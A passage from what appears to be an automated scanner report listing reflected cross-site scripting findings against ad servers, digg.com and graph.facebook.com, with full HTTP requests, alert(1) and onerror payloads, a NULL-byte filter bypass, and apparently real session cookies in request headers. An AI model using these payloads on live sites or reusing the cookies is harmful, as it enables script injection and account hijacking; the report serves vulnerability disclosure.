Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5517'-alert(1)-'a705b220f40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_post/tier2_082410b5517'-alert(1)-'a705b220f40 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410b5517'-alert(1)-'a705b220f40;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a584c'-alert(1)-'2281f760d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_post/tier2_082410?a584c'-alert(1)-'2281f760d0a=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 428
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410?a584c'-alert(1)-'2281f760d0a=1;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dae6'-alert(1)-'acf0dbd71b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe9dae6'-alert(1)-'acf0dbd71b7/adServer.bs HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3618B456B693FCDA3A5001C9348C29F4; Path=/
Content-Type: text/javascript
Content-Length: 1225
Date: Fri, 26 Nov 2010 20:41:53 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe9dae6'-alert(1)-'acf0dbd71b7/adServer.bs?adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.5. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b135'-alert(1)-'6e2895fb84f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs2b135'-alert(1)-'6e2895fb84f HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5127DD8FCDA6B7592B42E46B38C8ED68; Path=/
Content-Type: text/javascript
Content-Length: 1225
Date: Fri, 26 Nov 2010 20:41:53 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs2b135'-alert(1)-'6e2895fb84f?adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.6. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e81c'-alert(1)-'f8b51afdb8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?9e81c'-alert(1)-'f8b51afdb8e=1 HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=E428A7D316277BA8A490BD2AAB2C033B;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=151BE2FC65054D7EC39904B74296DE88; Path=/
Content-Type: text/javascript
Content-Length: 1228
Date: Fri, 26 Nov 2010 20:41:52 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?9e81c'-alert(1)-'f8b51afdb8e=1&adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.7. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ad931"><script>alert(1)</script>1d575234271 was submitted in the REST URL parameter 1. This input was echoed as ad931"><script>alert(1)</script>1d575234271 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00ad931"><script>alert(1)</script>1d575234271 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:41:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233659329%3A138; expires=Sun, 26-Dec-2010 20:41:13 GMT; path=/; domain=digg.com
Set-Cookie: d=3b30cc627977cd2173aa86583efb5e85fe713731d6c62da283122235337ac2ee; expires=Thu, 26-Nov-2020 06:48:53 GMT; path=/; domain=.digg.com
X-Digg-Time: D=213813 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15329

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ad931"><script>alert(1)</script>1d575234271.rss">
...[SNIP]...

1.8. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /100001833502192/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615 was submitted in the REST URL parameter 1. This input was echoed as 991bf<img src=a onerror=alert(1)>c41e23e615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /100001833502192991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 187

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615"
}
}

1.9. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /100001833502192/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8f9b<script>alert(1)</script>cc89cf21ad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /100001833502192/pictureb8f9b<script>alert(1)</script>cc89cf21ad5/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /pictureb8f9b<script>alert(1)</script>cc89cf21ad5/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /pictureb8f9b<script>alert(1)</script>cc89cf21ad5/"
}
}

1.10. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /1530270529/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54 was submitted in the REST URL parameter 1. This input was echoed as 8543f<img src=a onerror=alert(1)>ee45f9fcf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /15302705298543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 183

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54"
}
}

1.11. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /1530270529/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1b57<script>alert(1)</script>d2a58a8d4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1530270529/picturea1b57<script>alert(1)</script>d2a58a8d4f1/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picturea1b57<script>alert(1)</script>d2a58a8d4f1/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:19 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picturea1b57<script>alert(1)</script>d2a58a8d4f1/"
}
}

1.12. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /21488703512/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0 was submitted in the REST URL parameter 1. This input was echoed as 325bc<img src=a onerror=alert(1)>b3132b40c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /21488703512325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 183

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 21488703512325bc<img src=a onerror=alert(1)>b3132b40c0"
}
}

1.13. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /21488703512/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92bff<script>alert(1)</script>dea8e2a2b80 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /21488703512/picture92bff<script>alert(1)</script>dea8e2a2b80/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture92bff<script>alert(1)</script>dea8e2a2b80/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picture92bff<script>alert(1)</script>dea8e2a2b80/"
}
}

1.14. http://graph.facebook.com/23418060/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /23418060/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298 was submitted in the REST URL parameter 1. This input was echoed as 3ea3f<img src=a onerror=alert(1)>06ff2464298 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /234180603ea3f<img%20src%3da%20onerror%3dalert(1)>06ff2464298/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 181

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 234180603ea3f<img src=a onerror=alert(1)>06ff2464298"
}
}

1.15. http://graph.facebook.com/23418060/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /23418060/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 692ff<script>alert(1)</script>20a0b20959 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /23418060/picture692ff<script>alert(1)</script>20a0b20959/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picture692ff<script>alert(1)</script>20a0b20959/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:19 GMT
Content-Length: 148

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picture692ff<script>alert(1)</script>20a0b20959/"
}
}

1.16. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24960'-alert(1)-'72eb4f88e56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7287
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-85432089_1290804087","http://ad.doubleclick.net//cm.ny_post24960'-alert(1)-'72eb4f88e56/tier2_082410;net=cm;u=,cm-85432089_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sport
...[SNIP]...

1.17. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4317a'-alert(1)-'3cc42b9ee5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7286
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-58617865_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_0824104317a'-alert(1)-'3cc42b9ee5;net=cm;u=,cm-58617865_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.c
...[SNIP]...

1.18. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.ny_post/tier2_082410

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646e9'-alert(1)-'9979033da62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
